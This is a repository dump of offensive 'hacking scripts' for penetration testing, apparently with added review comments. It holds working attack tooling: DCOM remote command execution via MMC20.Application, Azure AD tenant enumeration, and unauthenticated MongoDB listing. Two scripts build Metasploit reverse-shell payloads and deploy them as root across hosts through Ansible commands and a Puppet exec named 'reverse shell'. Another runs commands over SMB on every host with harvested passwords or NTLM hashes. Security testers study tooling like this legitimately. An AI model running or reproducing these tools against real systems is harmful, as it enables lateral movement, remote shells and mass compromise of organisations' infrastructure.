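├── README.md
├── Invoke-MMC20RCE.ps1
├── AzureADEnumerator.ps1
├── mongodb_noauth.py
├── pwnsible.sh
├── pwnpet.sh
└── cmeMassCommand.py

/README.md:
--------------------------------------------------------------------------------
# Random-Hacking-Scripts
A collection of scripts made during my personal research

--------------------------------------------------------------------------------
/Invoke-MMC20RCE.ps1:
--------------------------------------------------------------------------------
function Invoke-MMC20RCE {
    <#
    .SYNOPSIS
    Research on Lateral movement using MMC20.Application COM Object by Matt "enigma0x3" Nelson
    A simple implementation by Tanoy "n0tty" Bose
    .DESCRIPTION
    Activates the MMC20.Application COM object on the target over DCOM and calls
    Document.ActiveView.ExecuteShellCommand so that mmc.exe on the target starts
    CMD with PARAMS. The activation runs under the caller's current Windows
    identity: the caller needs DCOM launch/activation rights on the target
    (in practice local administrator - confirm for your environment) and the
    target must accept DCOM (TCP 135 plus the dynamic RPC port range). The child
    process is spawned by mmc.exe, which is an unusual parent/child pair and
    therefore easy to detect; treat this technique as noisy.
    https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
    .PARAMETER IP
    Specify the target IP address or host name.
    .PARAMETER CMD
    Specify the command that needs to be executed.
    .PARAMETER PARAMS
    Additional parameters that are passed to the command (optional).
    .EXAMPLE
    Invoke-MMC20RCE -ip 127.0.0.1 -cmd cmd.exe -params "if any parameters required"
    Invoke-MMC20RCE -ip 127.0.0.1 -cmd "C:\Windows\System32\cmd.exe" -params "if any parameters required"
    #>

    param(
        [Parameter(Mandatory=$true)]
        [ValidateNotNullOrEmpty()]
        [String]
        $IP,
        [Parameter(Mandatory=$true)]
        [ValidateNotNullOrEmpty()]
        [String]
        $cmd,
        [Parameter(Mandatory=$false)]
        [String]
        $params
    )

    # GetTypeFromProgID with a server argument resolves the ProgID on $IP and
    # returns $null (instead of throwing) when it cannot; fail with a clear
    # message rather than letting CreateInstance throw ArgumentNullException.
    $type = [type]::GetTypeFromProgID("MMC20.Application",$IP)
    if (-not $type) {
        throw "Could not resolve MMC20.Application on $IP (DCOM unreachable or access denied)"
    }
    $com = [activator]::CreateInstance($type)
    try {
        # ExecuteShellCommand(Command, Directory, Parameters, WindowState).
        # "7" is the value used in the enigma0x3 write-up; in the ShowWindow
        # table 7 is SW_SHOWMINNOACTIVE (minimised, not activated) - confirm
        # against the MMC documentation if another window state is wanted.
        $com.Document.ActiveView.ExecuteShellCommand($cmd,$null,$params,"7")
    } finally {
        # Release the RCW so the DCOM proxy is dropped when the function
        # returns. NOTE(review): this does not stop the mmc.exe instance the
        # activation started on the target.
        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($com)
    }
}

--------------------------------------------------------------------------------
/AzureADEnumerator.ps1:
--------------------------------------------------------------------------------
# Simple Script made for BalCCon 2k18
# Built by @TanoyBose

# NOTE(review): the AzureAD PowerShell module has been retired by Microsoft in
# favour of the Microsoft Graph PowerShell SDK; confirm it still installs and
# signs in before relying on this script.
Import-Module AzureAD
Echo 'Prompting for credential.'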
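$AzureAdCred = Get-Credential
Echo 'Attempting to connect to Azure AD'
# NOTE(review): -Credential is a non-interactive username/password sign-in and
# does not complete for accounts that require MFA or Conditional Access; use an
# interactive Connect-AzureAD for those accounts.
Connect-AzureAD -Credential $AzureAdCred
echo "Getting Tenant Details"
Get-AzureADTenantDetail | Export-Csv Get-AzureADTenantDetail.csv
echo "Getting Azure AD domain information"
Get-AzureADDomain | Export-Csv Get-AzureADDomain.csv
echo "Getting Azure AD Directory roles"
Get-AzureADDirectoryRole | Export-Csv Get-AzureADDirectoryRole.csv
echo "Extracting Directory Role"
# Members of every role are appended to one text file. A header line records
# which role a block of members belongs to; the original wrote the members
# only, so the file could not be attributed back to a role.
Get-AzureADDirectoryRole | ForEach-Object {
    $val = $_.ObjectId
    echo "Extracting directory roles of ObjectID: $val"
    "### DirectoryRole ObjectId: $val" | Out-File Get-AzureADDirectoryRole.txt -Append
    Get-AzureADDirectoryRoleMember -ObjectId $val | Out-File Get-AzureADDirectoryRole.txt -Append
}
Echo "Extracting all azure ad groups"
Get-AzureADGroup -All $true | Export-Csv Get-AzureADGroup.csv
echo "Extracting Group Members"
# -All $true is required here as well: the CSV export above used it but this
# loop did not, so only the first page of groups (the default page size) was
# walked and the membership of every later group was silently missed.
Get-AzureADGroup -All $true | ForEach-Object {
    $val = $_.ObjectId
    echo "Extracting Group members of ObjectID: $val"
    "### Group ObjectId: $val" | Out-File Get-AzureADGroupMember.txt -Append
    Get-AzureADGroupMember -ObjectId $val -All $true | Out-File Get-AzureADGroupMember.txt -Append
}
echo "Extracting all azure ad users"
Get-AzureADUser -All $true | Export-Csv Get-AzureADUser.csv
echo "Extracting all azure ad devices"
Get-AzureADDevice -All $true | Export-Csv Get-AzureADDevice_All.csv
echo "Extracting all azure service principals"
Get-AzureADServicePrincipal -All $true | Export-Csv Get-AzureADServicePrincipal.csv

--------------------------------------------------------------------------------
/mongodb_noauth.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
"""Connect to a MongoDB server without credentials and list its database names.

Built as a small PoC for pentests where installing the full MongoDB client was
not possible. Only point it at servers you are authorised to test.
"""
from __future__ import print_function

import sys
import time

import pymongo

try:
    # Python 2: raw_input() returns the typed text. The original read the port
    # with input(), which on Python 2 eval()s whatever is typed - a typo or a
    # pasted expression would have been executed as Python.
    _read_line = raw_input
except NameError:  # Python 3 only has input(), which is the safe variant
    _read_line = input

DEFAULT_PORT = 27017


def greet():
    """Print the banner (Greetz)."""
    print("""
MongoDB Connector and database names extractor using Python v2.7 by n0tty

legendtanoybose@gmail.com
https://github.com/n0tty

__________
\\______ \\ ____ ______ ____
| | _// _ \\/ ___// __ \\
| | ( <_> )___ \\\\ ___/
|______ /\\____/____ >\\___ >
\\/ \\/ \\/
""")


def ask_port(default=DEFAULT_PORT):
    """Prompt for the TCP port and return it; blank or invalid input yields default.

    Valid ports are 1-65535 inclusive. The original test (port<=1 or
    port>=65535) wrongly rejected both ends of the range.
    """
    answer = _read_line("Please input the port number (default is %d): " % default).strip()
    if not answer:
        return default
    try:
        port = int(answer)
    except ValueError:
        port = 0
    if not 1 <= port <= 65535:
        print("You have entered an invalid port number and hence default port (%d) has been selected" % default)
        return default
    return port


def list_databases(ip_address, port):
    """Connect anonymously to ip_address:port and return the server's database names.

    Raises pymongo.errors.PyMongoError (a ConnectionFailure when the server
    cannot be reached). Works with both the pre-3.x Connection/database_names()
    API the script was written against and MongoClient/list_database_names().
    """
    client_cls = getattr(pymongo, "MongoClient", None) or pymongo.Connection
    conn = client_cls(ip_address, port)
    try:
        if hasattr(conn, "list_database_names"):
            return conn.list_database_names()
        return conn.database_names()
    finally:
        # Always close. The original closed only on the success path and hit a
        # NameError on conn.close() after a failed connect.
        conn.close()


def main():
    """Run the interactive flow and return the process exit status."""
    greet()
    print("""

Reason:
I built this because of unavailability of internet to download the 155+ MB of MongoDB client
on a linux system to generate a PoC during a PenTest

FYI:
This code has been tried and tested on Kali Linux 1.10 and Python version 2.7.3

""")

    ip_address = _read_line("Please enter the IP address of the server: ").strip()
    port = ask_port()

    print("Connecting...")
    print("[*] Extracting Database Names")
    try:
        databases = list_databases(ip_address, port)
    except pymongo.errors.ConnectionFailure as e:
        print("Failed to connect to the database: %s" % e)
        return 1
    except pymongo.errors.PyMongoError as e:
        # The original wrote 'except pymongo.errors' - a module, not an
        # exception class - which itself raised when an error occurred.
        # This branch is reached e.g. when the server answers but rejects
        # listDatabases because authentication is enabled after all.
        print("Fail to extract databases: %s" % e)
        return 1
    print("[+] Connection is Successful")
    print("[+] Got Database Names successfully")
    time.sleep(2)
    print("[*] Dumping database names: ")
    for name in databases:
        print(name)
        time.sleep(1)
    return 0


if __name__ == "__main__":
    sys.exit(main())


--------------------------------------------------------------------------------
/pwnsible.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Useful MSF Commands:
# msfvenom --list payloads
# msfvenom --list encoders
# msfvenom --help-formats
#
# You will need metasploit framework installed obviously

echo "+-------------------------------------------------------------------------+"
echo "| Pwnsible |"
echo "| The payload generator to pwn a ansible infrastructure using msf |"
echo "|http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1|"
echo "+-------------------------------------------------------------------------+"
echo "| Author: Tanoy 'n0tty' Bose |"
echo "+-------------------------------------------------------------------------+"
echo ""

# Positional arguments: $1 msfvenom payload, $2 msfvenom format, $3 LHOST,
# $4 LPORT, $5 output directory. The placeholders of the original usage line
# were lost (angle brackets stripped), so they are spelled out here.
function helpUsage {
    echo "Usage: ./pwnsible.sh PAYLOAD FORMAT LHOST LPORT OUTPUT_DIR"
    echo "Example: ./pwnsible.sh linux/x86/meterpreter_reverse_http elf 192.168.56.1 80 ansiblePwner"
}

# Generate the payload with msfvenom into OUTPUT_DIR/payload.file.
function createPayload {
    mkdir -p "${5}/"
    msfvenom -p "${1}" -f "${2}" lhost="${3}" lport="${4}" > "${5}/payload.file"
}

# Write the multi/handler resource script and a launcher under /tmp and start
# the handler in a new gnome-terminal. $1 payload, $2 LPORT.
# NOTE(review): the two paths are fixed and /tmp is shared, so another local
# user could pre-create them; run this from a private machine or move them to
# a per-user directory (finalInstructions removes the same two paths).
function msfResourceScriptCreator {
    echo "Creating metasploit resource script"
    # Start from empty files: the original 'touch' + '>>' appended to whatever
    # an earlier run had left behind, so a second run produced a resource
    # script with every command doubled.
    rm -f /tmp/pwnsible.rc /tmp/msfansible.sh
    echo "use exploit/multi/handler" > /tmp/pwnsible.rc
    echo "set PAYLOAD ${1}" >> /tmp/pwnsible.rc
    echo "set LHOST 0.0.0.0" >> /tmp/pwnsible.rc
    echo "set LPORT ${2}" >> /tmp/pwnsible.rc
    echo "set ExitOnSession false" >> /tmp/pwnsible.rc
    echo "exploit -j -z" >> /tmp/pwnsible.rc
    echo "#!/bin/bash" > /tmp/msfansible.sh
    echo "service postgresql start" >> /tmp/msfansible.sh
    echo "msfconsole -r /tmp/pwnsible.rc" >> /tmp/msfansible.sh
    chmod +x /tmp/msfansible.sh
    echo "Launching Metasploit session"
    gnome-terminal -e "bash -c \"/tmp/msfansible.sh; exec bash\""
}

# Print the manual steps for the ansible controller, then remove the local
# helper files. $1 output directory.
function finalInstructions {
    echo "Read http://n0tty.github.io/Enterprise-Offense-Ansible-Pwnage before running this script on your client environment"
    echo "Instructions:"
    echo "The payload has been generated. Now you need to copy the payload file to /etc/ansible/ directory in the ansible server and then run the following commands: "
    # ansible needs a host pattern before -m; the original omitted it (most
    # likely a stripped <pattern> placeholder), so the printed commands did
    # not run as shown.
    echo "(replace HOST_PATTERN with the inventory group or host to target, e.g. all)"
    echo "ansible HOST_PATTERN -m copy -a \"src=/etc/ansible/payload.file dest=/tmp/\" -u root"
    echo "ansible HOST_PATTERN -m shell -a \"chmod +x /tmp/payload.file\" -u root"
    echo "ansible HOST_PATTERN -m shell -a \"/tmp/payload.file\""
    echo ""
    echo "to cleanup just delete /tmp/payload.file from the target "
    sleep 20
    echo "Initiating local cleanup..."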
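    rm -f /tmp/msfansible.sh
    rm -f /tmp/pwnsible.rc
    echo "Local system cleanup complete"
    echo "Remember to delete folder ${1} from your local system, once your activity has been completed"

}

# Show usage unless all five arguments are present. The original chained the
# tests with a single '&', which backgrounds each test instead of AND-ing
# them, and AND was the wrong operator anyway: usage must appear when ANY
# argument is missing.
if [ "$#" -lt 5 ]; then
    helpUsage
else
    createPayload "${1}" "${2}" "${3}" "${4}" "${5}"
    msfResourceScriptCreator "${1}" "${4}"
    finalInstructions "${5}"
fi

--------------------------------------------------------------------------------
/pwnpet.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Useful MSF Commands:
# msfvenom --list payloads
# msfvenom --list encoders
# msfvenom --help-formats
#
# You will need metasploit framework installed obviously

echo "+-------------------------------------------------------------------------+"
echo "| Pwnpet |"
echo "| The payload generator to pwn a puppet infrastructure using msf |"
echo "|http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1|"
echo "+-------------------------------------------------------------------------+"
echo "| Author: Tanoy 'n0tty' Bose |"
echo "+-------------------------------------------------------------------------+"
echo ""

# Positional arguments: $1 msfvenom payload, $2 msfvenom format, $3 LHOST,
# $4 LPORT, $5 output directory. The placeholders of the original usage line
# were lost (angle brackets stripped), so they are spelled out here.
function helpUsage {
    echo "Usage: ./pwnpet.sh PAYLOAD FORMAT LHOST LPORT OUTPUT_DIR"
    echo "Example: ./pwnpet.sh linux/x86/meterpreter_reverse_http elf 192.168.56.1 80 puppetPwner"
}

# Build a minimal puppet module tree under OUTPUT_DIR:
#   manifests/site.pp                  - node block that includes the module
#   modules/my_file/files/payload      - the msfvenom payload
#   modules/my_file/manifests/init.pp  - class that ships and runs the payload
function createPayload {
    echo "Creating Puppet Payloads..."
    mkdir -p "${5}/modules/my_file/files/"
    mkdir -p "${5}/modules/my_file/manifests/"
    mkdir -p "${5}/manifests/"
    msfvenom -p "${1}" -f "${2}" lhost="${3}" lport="${4}" > "${5}/modules/my_file/files/payload"
    # The node block only matches an agent whose certname is 'puppetclient';
    # edit it (or use 'default') for the clients you actually want to reach.
    cat > "${5}/manifests/site.pp" <<'EOF'
node 'puppetclient' {
  include my_file
}
EOF
    # mode 0700 instead of the original 0777: the exec below runs the file as
    # the agent's user (root on a standard install), so a world-writable copy
    # would let any local user on the client replace it and get root on the
    # next run. The exec has no creates/refreshonly guard, so it re-runs (and
    # re-spawns a session) on every agent run - same as the original.
    cat > "${5}/modules/my_file/manifests/init.pp" <<'EOF'
class my_file {
  file { '/tmp/payload':
    ensure => present,
    source => 'puppet:///modules/my_file/payload',
    owner  => root,
    group  => root,
    mode   => '0700',
  }
  exec { 'reverse shell':
    command => '/tmp/payload',
    require => File['/tmp/payload'],
  }
}
EOF
}

# Write the multi/handler resource script and a launcher under /tmp and start
# the handler in a new gnome-terminal. $1 payload, $2 LPORT.
# NOTE(review): the two paths are fixed and /tmp is shared, so another local
# user could pre-create them; run this from a private machine or move them to
# a per-user directory (finalInstructions removes the same two paths).
function msfResourceScriptCreator {
    echo "Creating metasploit resource script"
    # Start from empty files: the original 'touch' + '>>' appended to whatever
    # an earlier run had left behind, so a second run produced a resource
    # script with every command doubled.
    rm -f /tmp/pwnpet.rc /tmp/msfpuppet.sh
    echo "use exploit/multi/handler" > /tmp/pwnpet.rc
    echo "set PAYLOAD ${1}" >> /tmp/pwnpet.rc
    echo "set LHOST 0.0.0.0" >> /tmp/pwnpet.rc
    echo "set LPORT ${2}" >> /tmp/pwnpet.rc
    echo "set ExitOnSession false" >> /tmp/pwnpet.rc
    echo "exploit -j -z" >> /tmp/pwnpet.rc
    echo "#!/bin/bash" > /tmp/msfpuppet.sh
    echo "service postgresql start" >> /tmp/msfpuppet.sh
    echo "msfconsole -r /tmp/pwnpet.rc" >> /tmp/msfpuppet.sh
    chmod +x /tmp/msfpuppet.sh
    echo "Launching Metasploit session"
    gnome-terminal -e "bash -c \"/tmp/msfpuppet.sh; exec bash\""
}

# Print the manual steps for the puppet master, then remove the local helper
# files. $1 output directory.
function finalInstructions {
    echo "Read http://n0tty.github.io/Enterprise-Offense-Puppet-Pwnage before running this script on your client environment"
    echo "Instructions:"
    echo "Copy the contents of the folder ${1} into the puppet folder w.r.t the puppet directory structure"
    echo "Wait for the puppet clients that pull these configurations to connect to your metasploit server and create session"
    echo "For puppet client cleanup, delete the /tmp/payload file"
    echo "For puppet server cleanup, delete all the items added by you"
    sleep 20
    echo "Initiating local cleanup..."
    rm -f /tmp/msfpuppet.sh
    rm -f /tmp/pwnpet.rc
    echo "Local system cleanup complete"
    echo "Remember to delete folder ${1} from your local system, once your activity has been completed"

}

# Show usage unless all five arguments are present (see pwnsible.sh for why
# the original '&'-chained test was wrong).
if [ "$#" -lt 5 ]; then
    helpUsage
else
    createPayload "${1}" "${2}" "${3}" "${4}" "${5}"
    msfResourceScriptCreator "${1}" "${4}"
    finalInstructions "${5}"
fi


--------------------------------------------------------------------------------
/cmeMassCommand.py:
--------------------------------------------------------------------------------
#!/usr/bin/python2

# Mass CrackMapExec command execution script
# v0.1 Utilizes all the compromised non-domain credentials to execute one command on their respective compromised computers and output them.
# The utilized method to execute command is smb on port 445

# Licensed under BSD 4 Clause License
# Copyleft @TanoyBose 2018

'''
Copyright (c) 2018 Tanoy Bose. All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. All advertising materials mentioning features or use of this software must display the following acknowledgement:
This product includes software developed by the organization.
4. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.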
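
THIS SOFTWARE IS PROVIDED BY COPYRIGHT HOLDER "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import print_function

import csv
import datetime
import os
import re
import subprocess
import sys

try:
    # Python 2 (the shebang): raw_input() returns the typed text.
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input

# Seconds after which one cme invocation is killed (coreutils `timeout`, as in
# the original), so a single unreachable host cannot stall the whole batch.
CME_TIMEOUT_SECONDS = 90

# Everything outside this set is replaced in the command part of the output
# filename; a command containing '/' would otherwise become a path component.
_UNSAFE_FILENAME_CHARS = re.compile(r"[^A-Za-z0-9._-]+")


def cmeDomainUserCommandExec(cmeCred, currentTime, cmdExec):
    """Placeholder for execution with domain credentials (not implemented in v0.1)."""
    # Still to build this module
    pass


def _isSafeHostDir(name):
    """Return True when name is usable as a per-host output directory inside the cwd.

    The host name comes straight from the exported CSV; a value such as
    '../x' or '/etc' must never be turned into a path. (The original test
    used str.find(), whose -1 "not found" result is truthy, so it never fired.)
    """
    return bool(name) and "/" not in name and "\\" not in name and ".." not in name


def _cmeArgv(cmeCred, cmdExec):
    """Return the argv list for one cme run, or None when the credential type is unknown.

    cmeCred is one row of the cmedb export: [1] domain column (for a local
    account this is the host the credential belongs to), [2] user name,
    [3] password or NTLM hash, [4] 'plaintext' or 'hash'.

    An argv list is built instead of a shell string so that quotes, ';' or
    '$' in the password or the command reach cme verbatim rather than being
    interpreted by /bin/sh (the original ran os.system() on a concatenated
    string, which is command injection from the CSV or the prompt).
    """
    if cmeCred[4] == "plaintext":
        secretFlag = "-p"
    elif cmeCred[4] == "hash":
        secretFlag = "-H"
    else:
        return None
    return ["timeout", str(CME_TIMEOUT_SECONDS), "cme", "smb", cmeCred[1],
            "-u", cmeCred[2], secretFlag, cmeCred[3], "-x", cmdExec]


def cmeCommandExec(cmeCred, currentTime, cmdExec):
    """Run cmdExec on cmeCred's host over SMB and store cme's stdout under <host>/.

    The output file is <host>/<host>_<currentTime>_<cmd>.txt; the host
    directory is created if missing. Returns True when cme exited 0, False
    when the credential type is unknown, the host name is unsafe as a
    directory, or cme failed / timed out / could not be started. (The
    original referenced the misspelt names cmdCred and cmdExecCode and
    raised NameError before running anything.)
    """
    host = cmeCred[1]
    argv = _cmeArgv(cmeCred, cmdExec)
    if argv is None:
        print("[-] Unknown credential type %r for %s, skipping" % (cmeCred[4], host))
        return False
    if not _isSafeHostDir(host):
        print("[-] Refusing to use %r as an output directory" % host)
        return False
    cmdExecFilename = host + "_" + currentTime + "_" + _UNSAFE_FILENAME_CHARS.sub("_", cmdExec) + ".txt"
    # Echo the command with the secret masked; the password/hash is already
    # in the CSV and does not need to land in terminal scrollback as well.
    shown = ["***" if arg == cmeCred[3] else arg for arg in argv]
    print("Performing: " + " ".join(shown))
    if not os.path.isdir(host):
        os.makedirs(host)
    try:
        with open(os.path.join(host, cmdExecFilename), "wb") as outFile:
            execStatus = subprocess.call(argv, stdout=outFile)
    except OSError as e:
        # `timeout` or `cme` not on PATH
        print("[-] Could not start cme: %s" % e)
        return False
    if execStatus == 0:
        print("[*] Command Executed Successfully!")
        print("[*] File Created Successfully!")
        return True
    print("[-] cme exited with status %d for %s" % (execStatus, host))
    return False


def executeEnumeration(cmecreds, cmdExec):
    """Run the per-host helpers and then cmdExec against every credential row in cmecreds.

    Exits with status 1 if a host name is unusable as an output directory.
    """
    currentTime = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
    for cred in cmecreds:
        host = cred[1]
        print("[*] Attempting hostname: ", host)
        # The host name becomes an output directory; refuse anything that
        # could point outside the working directory.
        if not _isSafeHostDir(host):
            print("Holy Shit! You almost deleted directories! Looks like you don't know what you are doing. Exiting!")
            sys.exit(1)
        # cmeIpconfigHost / cmeNetstatHost are referenced by v0.1 but not
        # defined in this file; call them only if a later version adds them
        # instead of dying with NameError before the user's command runs.
        for helperName in ("cmeIpconfigHost", "cmeNetstatHost"):
            helper = globals().get(helperName)
            if helper is not None:
                helper(cred, currentTime)
        cmeCommandExec(cred, currentTime, cmdExec)


def loadCredsFromCme(cmeExportedFile, domainAlias, domainFqdn):
    """Split a cmedb CSV export into (domain, weird, workstation) credential rows.

    Rows are bucketed on their domain column (index 1): equal to domainAlias
    or domainFqdn -> domain creds; empty -> "weird"; anything else is a local
    account whose domain column is the host it was found on. Fields are
    whitespace-stripped so a trailing newline on the last column cannot break
    later equality tests (the original kept readlines()' '\\n'), and blank
    lines are skipped instead of raising IndexError.
    """
    print("Loading creds database")
    domainCompromisedCreds = []
    weirdCompromisedCreds = []
    workstationCompromisedCreds = []
    with open(cmeExportedFile, "r") as fp:
        for row in csv.reader(fp):
            if not row:
                continue
            row = [field.strip() for field in row]
            domain = row[1] if len(row) > 1 else ""
            if domain == domainAlias:
                domainCompromisedCreds.append(row)
            elif domain == domainFqdn:
                domainCompromisedCreds.append(row)
            elif domain == "":
                weirdCompromisedCreds.append(row)
            else:
                workstationCompromisedCreds.append(row)
    return domainCompromisedCreds, weirdCompromisedCreds, workstationCompromisedCreds


def main():
    """Prompt for the domain, the cmedb export and the command, then run it on every workstation credential."""
    domainFqdn = _read_line("Enter the FQDN: ")
    domainAlias = _read_line("Enter the alias: ")
    cmeExportedFile = _read_line("Enter the CMEDB Exported CSV filename: ")
    cmdExec = _read_line("Enter the command to be executed: ")
    domainCompromisedCreds, weirdCompromisedCreds, workstationCompromisedCreds = loadCredsFromCme(cmeExportedFile, domainAlias, domainFqdn)
    executeEnumeration(workstationCompromisedCreds, cmdExec)


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------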